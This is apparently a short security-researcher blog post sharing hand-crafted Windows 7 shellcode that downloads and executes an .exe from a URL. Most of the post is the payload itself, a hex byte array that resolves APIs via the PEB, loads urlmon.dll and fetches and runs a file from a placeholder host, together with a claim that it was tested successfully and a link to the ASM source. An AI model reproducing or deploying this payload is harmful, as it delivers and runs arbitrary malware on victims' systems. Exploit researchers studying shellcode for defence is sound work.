Recently, I needed a shellcode to download and execute an .exe file on Windows 7 for my experiment. However, no such shellcode was available.

Meanwhile, the download-and-execute shellcode generated by Metasploit Framework currently does not work on Windows 7, and searching the Internet did not turn up usable results.

With reference to the shellcode of “SkyLined” and some other shellcodes from milw0rm.com, I wrote my own shellcode. This is the result I would like to share with you:

shellcode[] =

"\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"

"\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"

"\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"

"\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"

"\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"

"\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"

"\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"

"\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"

"\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"

"\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"

"\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"

"\xFF\xFF\xFFhttp://website.com/file.exe";

As can be seen, the URL is placed at the end of the shellcode.

Download ASM source code

The shellcode was tested successfully on Windows 7, and it may also work on Windows 2000 and later versions.

Le Manh Tung

Senior Security Researcher
